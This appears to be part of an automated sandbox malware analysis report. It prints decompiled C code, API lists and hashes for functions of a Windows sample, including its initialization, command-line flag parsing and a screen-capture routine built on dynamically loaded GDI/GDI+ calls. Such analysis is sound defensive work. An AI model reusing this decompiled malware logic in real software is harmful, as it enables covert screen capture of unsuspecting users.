					__imp__#115(0x202,  &_v404); // executed
					_t18 = E004036E0(_a4, _t36, _t38, _t41);
					__eflags = _t18;
					if(_t18 == 0) {
						goto L3;
					} else {
						_t20 = E0040375F(_a4);
						__eflags = _t20;
						if(_t20 == 0) {
							goto L3;
						} else {
							_t21 = E00411A2C(_t36, 0xffffffff, 0x41a2a0);
							 *0x41a294 = _t21;
							__eflags = _t21 - _t34;
							if(_t21 == _t34) {
								goto L3;
							} else {
								 *0x41a298 = GetLengthSid( *_t21);
								_t23 =  *0x41a294; // 0x0
								 *0x41a29c = E00411888( *_t23, _t22);
								_t25 = E004037AD(_t24, _a4);
								__eflags = _t25;
								if(_t25 == 0) {
									goto L3;
								} else {
									 *0x41a504 = GetCurrentProcessId();
									 *0x41a508 = _t34;
									__eflags = _t41 - _t34;
									if(_t41 != _t34) {
										_t27 = 1;
									} else {
										_t27 = E0040380F();
									}
									__eflags = _t27 - _t34;
									if(_t27 == _t34) {
										goto L3;
									} else {
										_t28 = E00403861(_a4);
										__eflags = _t28;
										if(_t28 == 0) {
											goto L3;
										} else {
											_t29 = E004038A7(_a4);
											__eflags = _t29;
											if(_t29 == 0) {
												goto L3;
											} else {
												__eflags = _a4 & 0x00000002;
												 *0x41bc78 = _t34;
												 *0x41aa80 = 0;
												 *0x41a7a0 = 0;
												 *0x41a870 = 0;
												 *0x41a808 = 0;
												 *0x41a958 = 0;
												 *0x41a8f0 = 0;
												if(__eflags == 0) {
													_t31 = 1;
												} else {
													_t31 = E00403947(_t36, _t37, __eflags);
												}
												__eflags = _t31 - _t34;
												_t13 = _t31 != _t34;
												__eflags = _t13;
												_t19 = _t31 & 0xffffff00 | _t13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L3:
					_t19 = 0;
				}
				return _t19;
			}





















            0x00403a5d
            0x00403a5d
            0x00403a5d
            0x00403a6e
            0x00403a73
            0x00403a74
            0x00403a76
            0x00403a76
            0x00403a86
            0x00403a96
            0x00403a9c
            0x00403aa1
            0x00403aa3
            0x00403ab8
            0x00403aa5
            0x00403aab
            0x00403ab0
            0x00403ab0
            0x00403ac4
            0x00403aca
            0x00403ad0
            0x00403ae0
            0x00403ae6
            0x00403aef
            0x00403af4
            0x00403af6
            0x00000000
            0x00403af8
            0x00403afb
            0x00403b00
            0x00403b02
            0x00000000
            0x00403b04
            0x00403b0b
            0x00403b10
            0x00403b15
            0x00403b17
            0x00000000
            0x00403b1d
            0x00403b25
            0x00403b2b
            0x00403b3a
            0x00403b3f
            0x00403b44
            0x00403b46
            0x00000000
            0x00403b4c
            0x00403b52
            0x00403b57
            0x00403b5d
            0x00403b5f
            0x00403b68
            0x00403b61
            0x00403b61
            0x00403b61
            0x00403b6a
            0x00403b6c
            0x00000000
            0x00403b72
            0x00403b75
            0x00403b7a
            0x00403b7c
            0x00000000
            0x00403b82
            0x00403b85
            0x00403b8a
            0x00403b8c
            0x00000000
            0x00403b92
            0x00403b94
            0x00403b98
            0x00403b9e
            0x00403ba4
            0x00403baa
            0x00403bb0
            0x00403bb6
            0x00403bbc
            0x00403bc2
            0x00403bcb
            0x00403bc4
            0x00403bc4
            0x00403bc4
            0x00403bcd
            0x00403bcf
            0x00403bcf
            0x00403bcf
            0x00403bcf
            0x00403b8c
            0x00403b7c
            0x00403b6c
            0x00403b46
            0x00403b17
            0x00403b02
            0x00403a88
            0x00403a88
            0x00403a88
            0x00403a88
            0x00403bd7

            APIs
            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 00403A96
            • GetProcessHeap.KERNEL32(?,00000000), ref: 00403AA5
            • InitializeCriticalSection.KERNEL32(0041A760,?,00000000), ref: 00403AD0
            • WSAStartup.WS2_32(00000202,?), ref: 00403AE6
            • GetLengthSid.ADVAPI32(00000000,000000FF,0041A2A0,00000000,?,00000000), ref: 00403B1F
            • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403B4C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: HeapProcess$CreateCriticalCurrentInitializeLengthSectionStartup
            • String ID:
            • API String ID: 2528102454-0
            • Opcode ID: dde0ae83ecacf24f674dfdb637875a71352792fd4847cb568878d810a7e51c77
            • Instruction ID: 32dc000f30b7c3c9b635613a1cf18e84f09b57cc9751b60119397a14bf2bc44b
            • Opcode Fuzzy Hash: dde0ae83ecacf24f674dfdb637875a71352792fd4847cb568878d810a7e51c77
            • Instruction Fuzzy Hash: 8E31D170511204AECB11BF64ED466D53FA8AB1435AB00817FF844A73B2DB3D4AA5CB5E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041493F Relevance: 10.6, APIs: 7, Instructions: 64COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 32%
            			E0041493F() {
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t40 = _t42 - 0x74;
				_t31 = 0; // executed
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t40 - 0x25c, _t34, _t37, _t30); // executed
				if(0 != 0) {
					L8:
					E004104B9( *((intOrPtr*)(_t40 + 0x7c)), 0x10);
				} else {
					PathAddBackslashW(_t40 - 0x25c);
					_t36 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t21 =  *_t36(_t40 - 0x25c, _t40 - 0x54, 0x64); // executed
						if(_t21 != 0) {
							break;
						}
						PathRemoveBackslashW(_t40 - 0x25c);
						if(PathRemoveFileSpecW(_t40 - 0x25c) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t40 - 0x25c);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t40 - 0x40)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t40 + 0xc)) = 0;
						_t29 = _t40 - 0x40;
						__imp__CLSIDFromString(_t29,  *((intOrPtr*)(_t40 + 0x7c)));
						if(_t29 != 0) {
							goto L8;
						} else {
							_t31 = 1;
						}
					}
				}
				L9:
				return _t31;
			}












            0x00414940
            0x0041495b
            0x0041495d
            0x00414965
            0x004149da
            0x004149df
            0x00414967
            0x00414974
            0x00414976
            0x004149a5
            0x004149b2
            0x004149b6
            0x00000000
            0x00000000
            0x00414985
            0x0041499a
            0x00000000
            0x0041499c
            0x004149a3
            0x00000000
            0x004149a3
            0x00000000
            0x0041499a
            0x004149bd
            0x00000000
            0x004149bf
            0x004149c4
            0x004149c8
            0x004149cc
            0x004149d4
            0x00000000
            0x004149d6
            0x004149d6
            0x004149d6
            0x004149d4
            0x004149bd
            0x004149e4
            0x004149ed

            APIs
            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,00000000), ref: 0041495D
            • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 00414974
            • PathRemoveBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 00414985
            • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00414992
            • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 004149A3
            • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064,?,00000000,00000000), ref: 004149B2
            • CLSIDFromString.OLE32(?,?,?,00000000,00000000), ref: 004149CC
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
            • String ID:
            • API String ID: 613918483-0
            • Opcode ID: e599c282255295374b0e4b888da2396a8634d9a93b45e76e3e1faf1b481da758
            • Instruction ID: df345cd24bca8c655181560241360e73fc933718f6736cb605dff7e2021c4ae5
            • Opcode Fuzzy Hash: e599c282255295374b0e4b888da2396a8634d9a93b45e76e3e1faf1b481da758
            • Instruction Fuzzy Hash: E71151B191021CAEDB209FB1DC48EDB77BCAB44315F104567E515E3160E638DA998B68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004046DB Relevance: 9.1, APIs: 6, Instructions: 67sleepCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 65 4046db-4046ed call 403a5d 68 4046f3-404718 SetErrorMode GetCommandLineW CommandLineToArgvW 65->68 69 40478c-404794 ExitProcess 65->69 70 404767-40476d call 404392 68->70 71 40471a-40471f 68->71 76 404772-404776 70->76 73 404721-404726 71->73 74 404755-40475e LocalFree 71->74 77 404728-40472c 73->77 78 40474f-404753 73->78 74->70 75 404760-404765 call 4041cd 74->75 75->76 76->69 80 404778-40477f 76->80 77->78 81 40472e-404735 77->81 78->73 78->74 80->69 83 404781-40478b Sleep 80->83 84 404737-40473a 81->84 85 40474b 81->85 86 404747-404749 84->86 87 40473c-40473f 84->87 85->78 86->78 87->78 88 404741-404745 87->88 88->78
            C-Code - Quality: 100%
            			_entry_(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				int _v8;
				char _v12;
				char _v16;
				void* _t17;
				void* _t23;
				signed int _t24;
				signed int _t26;
				signed int _t29;
				void* _t44;

				_t44 = __fp0;
				_t27 = __ecx;
				_t26 = 0; // executed
				_t17 = E00403A5D(__ecx, __edx, __edi, 0); // executed
				if(_t17 == 0) {
					L18:
					__eflags = _t26;
					_t16 = _t26 == 0;
					__eflags = _t16;
					ExitProcess(0 | _t16);
				}
				_v16 = 0;
				_v12 = 1;
				SetErrorMode(0x8007);
				_t23 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				if(_t23 == 0) {
					L14:
					_t24 = E00404392(_t27, __eflags, _t44, _v16, _v12);
					L15:
					_t26 = _t24;
					if(_t26 == 0 || ( *0x41a290 & 0x00000002) == 0) {
						goto L18;
					} else {
						Sleep(0xffffffff);
						return _t24;
					}
				}
				_t29 = 0;
				if(_v8 <= 0) {
					L12:
					LocalFree(_t23);
					_t41 = _t26;
					if(_t26 == 0) {
						goto L14;
					}
					_t24 = E004041CD(_t41);
					goto L15;
				} else {
					goto L3;
				}
				do {
					L3:
					_t27 =  *(_t23 + _t29 * 4);
					if(_t27 != 0 &&  *_t27 == 0x2d) {
						_t27 =  *(_t27 + 2) & 0x0000ffff;
						if(_t27 == 0x66) {
							_v16 = 1;
						} else {
							if(_t27 == 0x69) {
								_t26 = 1;
							} else {
								if(_t27 == 0x6e) {
									_v12 = 0;
								}
							}
						}
					}
					_t29 = _t29 + 1;
				} while (_t29 < _v8);
				goto L12;
			}












            0x004046db
            0x004046db
            0x004046e4
            0x004046e6
            0x004046ed
            0x0040478c
            0x0040478e
            0x00404790
            0x00404790
            0x00404794
            0x00404794
            0x004046f8
            0x004046fb
            0x004046ff
            0x00404710
            0x00404718
            0x00404767
            0x0040476d
            0x00404772
            0x00404772
            0x00404776
            0x00000000
            0x00404781
            0x00404783
            0x0040478b
            0x0040478b
            0x00404776
            0x0040471a
            0x0040471f
            0x00404755
            0x00404756
            0x0040475c
            0x0040475e
            0x00000000
            0x00000000
            0x00404760
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404721
            0x00404721
            0x00404721
            0x00404726
            0x0040472e
            0x00404735
            0x0040474b
            0x00404737
            0x0040473a
            0x00404747
            0x0040473c
            0x0040473f
            0x00404741
            0x00404741
            0x0040473f
            0x0040473a
            0x00404735
            0x0040474f
            0x00404750
            0x00000000

            APIs
            • SetErrorMode.KERNEL32(00008007,00000000), ref: 004046FF
            • GetCommandLineW.KERNEL32(?), ref: 00404709
            • CommandLineToArgvW.SHELL32(00000000), ref: 00404710
            • LocalFree.KERNEL32(00000000), ref: 00404756
            • Sleep.KERNEL32(000000FF,?,00000001), ref: 00404783
            • ExitProcess.KERNEL32 ref: 00404794
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CommandLine$ArgvErrorExitFreeLocalModeProcessSleep
            • String ID:
            • API String ID: 3718487608-0
            • Opcode ID: 39de526fb5890e4bd1d9e36ddd10359875b30cbf285049968ab3f43851a3edee
            • Instruction ID: d3c2a9df50fa9b9d900ea428d53b8a70a81716f2d6086dc67f08c346c9634b0f
            • Opcode Fuzzy Hash: 39de526fb5890e4bd1d9e36ddd10359875b30cbf285049968ab3f43851a3edee
            • Instruction Fuzzy Hash: 0E113FB0944244AACF1567B48E487BE3B69AFC3344F2880BFE641BB2E1C73D4944871A
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 0040FE5C Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 393libraryloaderwindowCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 112 40fe5c-40fef5 LoadLibraryA GetProcAddress * 7 113 40fefb-40fefe 112->113 114 4102dd-4102e6 112->114 113->114 117 40ff04-40ff07 113->117 115 4102e8-4102eb FreeLibrary 114->115 116 4102ed-4102f0 114->116 115->116 118 4102f2-4102f5 FreeLibrary 116->118 119 4102f7-4102fa 116->119 117->114 120 40ff0d-40ff10 117->120 118->119 121 410301-410308 119->121 122 4102fc-4102ff FreeLibrary 119->122 120->114 123 40ff16-40ff19 120->123 122->121 123->114 124 40ff1f-40ff22 123->124 124->114 125 40ff28-40ff2a 124->125 125->114 126 40ff30-40ff47 LoadLibraryA GetProcAddress 125->126 126->114 127 40ff4d-40ffbe LoadLibraryA GetProcAddress * 8 126->127 127->114 128 40ffc4-40ffc7 127->128 128->114 129 40ffcd-40ffd0 128->129 129->114 130 40ffd6-40ffd9 129->130 130->114 131 40ffdf-40ffe2 130->131 131->114 132 40ffe8-40ffeb 131->132 132->114 133 40fff1-40fff4 132->133 133->114 134 40fffa-40fffc 133->134 134->114 135 410002-410020 134->135 135->114 137 410026-410037 135->137 139 4102d7 137->139 140 41003d-410046 137->140 139->114 142 4102d1 140->142 143 41004c-410066 LoadImageW 140->143 142->139 144 410090-410092 143->144 145 410068-410078 GetIconInfo 143->145 148 410097-41009a 144->148 146 410088 145->146 147 41007a-410086 GetCursorPos 145->147 149 41008b-41008e 146->149 147->146 147->149 150 4100a4-4100b4 148->150 151 41009c-4100a2 148->151 149->144 152 410094 149->152 153 4100b7-4100c6 150->153 151->153 152->148 157 4102cb 153->157 158 4100cc-4100d8 153->158 157->142 160 4102c5 158->160 161 4100de-4100e5 158->161 160->157 162 4100e7-4100f1 161->162 163 41010e-410126 161->163 164 4100f3 162->164 165 4100f5-4100fa 162->165 169 4102bc-4102bf 163->169 170 41012c-41012f 163->170 164->165 167 4100fc 165->167 168 4100fe-410101 165->168 167->168 171 410103 168->171 172 410106-410109 168->172 169->160 174 410131-41013a 170->174 175 410159-410169 170->175 171->172 172->163 173 41010b 172->173 173->163 176 41013c 174->176 177 41013e-410147 174->177 175->169 181 41016f-410172 175->181 176->177 178 410149 177->178 179 41014b-410153 DrawIcon 177->179 178->179 179->175 181->169 182 410178-41018b 181->182 184 410191-410196 182->184 185 4102b6 182->185 184->185 186 41019c-41019f 184->186 185->169 186->185 187 4101a5-4101b1 call 4103ed 186->187 187->185 190 4101b7-4101c3 187->190 192 410201-41020c call 410418 190->192 193 4101c5-4101ca 190->193 192->185 198 410212-410220 192->198 193->192 195 4101cc 193->195 197 4101cf-4101dc lstrcmpiW 195->197 199 4101e9-4101fe call 410454 197->199 200 4101de-4101e5 197->200 198->185 205 410226-410229 198->205 199->192 200->197 201 4101e7 200->201 201->192 205->185 206 41022f-410238 205->206 207 410281-41029d 206->207 208 41023a-41027b call 410454 206->208 212 4102aa-4102b2 207->212 213 41029f-4102a8 207->213 208->207 212->185 213->185
            C-Code - Quality: 39%
            			E0040FE5C(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				int _t239;
				void* _t246;
				int _t251;
				unsigned int _t256;
				intOrPtr* _t258;
				signed short _t259;
				intOrPtr _t260;
				WCHAR** _t261;
				intOrPtr _t264;
				signed int _t265;
				signed int _t268;
				void* _t271;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L74:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L74;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t258 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t258 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L74;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L74;
						}
						_t264 =  *_t258(L"DISPLAY", 0, 0, 0);
						_v24 = _t264;
						if(_t264 == 0) {
							L73:
							_v80(_v116);
							goto L74;
						}
						_t197 = _v12(_t264);
						_v36 = _t197;
						if(_t197 == 0) {
							L72:
							_v68(_v24);
							goto L73;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t259 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t259 = _a12;
								L26:
								if(_t259 == 0) {
									_t200 = _v28(_t264, 8);
									_t265 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t265 = _t259 & 0x0000ffff;
									_a12 = _t265;
								}
								_t202 = _v44(_v24, _t265, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L71:
									_v68(_v36);
									goto L72;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L70:
										_v84(_v44);
										goto L71;
									}
									_t206 = 0;
									_t246 = 0;
									if(_t259 != 0) {
										_t256 = (_t259 & 0x0000ffff) >> 1;
										_t206 = _v52.x - _t256;
										if(_t206 < 0) {
											_t206 = 0;
										}
										_t246 = _v52.y - _t256;
										if(_t246 < 0) {
											_t246 = 0;
										}
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t246;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t246);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t265);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L69:
										_v56(_v36, _v112);
										goto L70;
									} else {
										if(_v12 != 0) {
											_t251 = _v52.x - _v172.xHotspot;
											if(_t251 < 0) {
												_t251 = 0;
											}
											_t239 = _v52.y - _v172.yHotspot;
											if(_t239 < 0) {
												_t239 = 0;
											}
											DrawIcon(_v36, _t251, _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L69;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L68:
												_v72(_v12);
												goto L69;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L68;
											} else {
												_t260 = E004103ED(_t215);
												_v40 = _t260;
												if(_t260 == 0) {
													goto L68;
												}
												_push(_t260);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L60:
													E00410418(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00410454( &_v148, 0x402f6c, 0x10);
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L68;
												}
												_t268 = 0;
												if(_a12 <= 0) {
													goto L60;
												}
												_t261 = _t260 + 0x30;
												while(lstrcmpiW(_a4,  *_t261) != 0) {
													_t268 = _t268 + 1;
													_t261 =  &(_t261[0x13]);
													if(_t268 < _a12) {
														continue;
													}
													goto L60;
												}
												E00410454( &_v188, _t268 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L60;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}




























































            0x0040fe75
            0x0040fe78
            0x0040fe7b
            0x0040fe7e
            0x0040fe85
            0x0040fe88
            0x0040fe8b
            0x0040fe8e
            0x0040fe9c
            0x0040fea9
            0x0040feb6
            0x0040fec3
            0x0040fed0
            0x0040fedd
            0x0040feea
            0x0040feed
            0x0040feef
            0x0040fef5
            0x004102dd
            0x004102e6
            0x004102eb
            0x004102eb
            0x004102f0
            0x004102f5
            0x004102f5
            0x004102fa
            0x004102ff
            0x004102ff
            0x00410308
            0x0040ff30
            0x0040ff35
            0x0040ff3d
            0x0040ff40
            0x0040ff42
            0x0040ff47
            0x00000000
            0x00000000
            0x0040ff52
            0x0040ff5a
            0x0040ff67
            0x0040ff73
            0x0040ff80
            0x0040ff8d
            0x0040ff9a
            0x0040ffa7
            0x0040ffb4
            0x0040ffb7
            0x0040ffb9
            0x0040ffbe
            0x00000000
            0x00410002
            0x00410002
            0x00410006
            0x0041000a
            0x0041000b
            0x00410012
            0x00410015
            0x00410018
            0x00410020
            0x00000000
            0x00000000
            0x00410030
            0x00410032
            0x00410037
            0x004102d7
            0x004102da
            0x00000000
            0x004102da
            0x0041003e
            0x00410041
            0x00410046
            0x004102d1
            0x004102d4
            0x00000000
            0x004102d4
            0x0041005b
            0x00410061
            0x00410066
            0x00410090
            0x00410090
            0x00000000
            0x00410068
            0x00410078
            0x00410088
            0x00410088
            0x0041008e
            0x00410094
            0x00410097
            0x0041009a
            0x004100a7
            0x004100af
            0x004100b4
            0x0041009c
            0x0041009c
            0x0041009f
            0x0041009f
            0x004100be
            0x004100c1
            0x004100c6
            0x004102cb
            0x004102ce
            0x00000000
            0x004100cc
            0x004100d0
            0x004100d3
            0x004100d8
            0x004102c5
            0x004102c8
            0x00000000
            0x004102c8
            0x004100de
            0x004100e0
            0x004100e5
            0x004100ed
            0x004100ef
            0x004100f1
            0x004100f3
            0x004100f3
            0x004100f8
            0x004100fa
            0x004100fc
            0x004100fc
            0x004100fe
            0x004100fe
            0x00410101
            0x00410103
            0x00410103
            0x00410106
            0x00410106
            0x00410109
            0x0041010b
            0x0041010b
            0x00410109
            0x0041010e
            0x00410113
            0x00410114
            0x00410115
            0x00410118
            0x0041011b
            0x0041011c
            0x0041011d
            0x0041011e
            0x00410126
            0x004102bc
            0x004102c2
            0x00000000
            0x0041012c
            0x0041012f
            0x00410134
            0x0041013a
            0x0041013c
            0x0041013c
            0x00410141
            0x00410147
            0x00410149
            0x00410149
            0x00410153
            0x00410153
            0x0041015c
            0x0041015d
            0x0041015e
            0x00410161
            0x00410169
            0x00000000
            0x00410178
            0x0041017b
            0x0041017f
            0x00410180
            0x00410183
            0x0041018b
            0x004102b6
            0x004102b9
            0x00000000
            0x004102b9
            0x00410191
            0x00410196
            0x00000000
            0x004101a5
            0x004101aa
            0x004101ac
            0x004101b1
            0x00000000
            0x00000000
            0x004101b7
            0x004101b8
            0x004101bb
            0x004101c3
            0x00410201
            0x00410204
            0x0041020c
            0x00410215
            0x00410219
            0x0041021a
            0x00410220
            0x0041022f
            0x00410238
            0x00410248
            0x00410256
            0x00410267
            0x00410277
            0x0041027b
            0x0041027b
            0x00410295
            0x0041029a
            0x0041029d
            0x004102b3
            0x0041029f
            0x004102a2
            0x004102a5
            0x004102a5
            0x0041029d
            0x00410220
            0x00000000
            0x0041020c
            0x004101c5
            0x004101ca
            0x00000000
            0x00000000
            0x004101cc
            0x004101cf
            0x004101de
            0x004101df
            0x004101e5
            0x00000000
            0x00000000
            0x00000000
            0x004101e7
            0x004101f9
            0x004101fe
            0x00000000
            0x004101fe
            0x00410196
            0x00410169
            0x00410126
            0x004100c6
            0x00000000
            0x0041008e
            0x00410066
            0x0040ffbe

            APIs
            • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040FE8E
            • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040FE9F
            • GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040FEAC
            • GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040FEB9
            • GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040FEC6
            • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040FED3
            • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040FEE0
            • GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040FEED
            • LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040FF35
            • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040FF40
            • LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040FF52
            • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040FF5D
            • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040FF69
            • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040FF76
            • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040FF83
            • GetProcAddress.KERNEL32(?,SelectObject), ref: 0040FF90
            • GetProcAddress.KERNEL32(?,BitBlt), ref: 0040FF9D
            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040FFAA
            • GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040FFB7
            • LoadImageW.USER32 ref: 0041005B
            • GetIconInfo.USER32(00000000,?), ref: 00410070
            • GetCursorPos.USER32(?), ref: 0041007E
            • DrawIcon.USER32 ref: 00410153
            • lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 004101D4
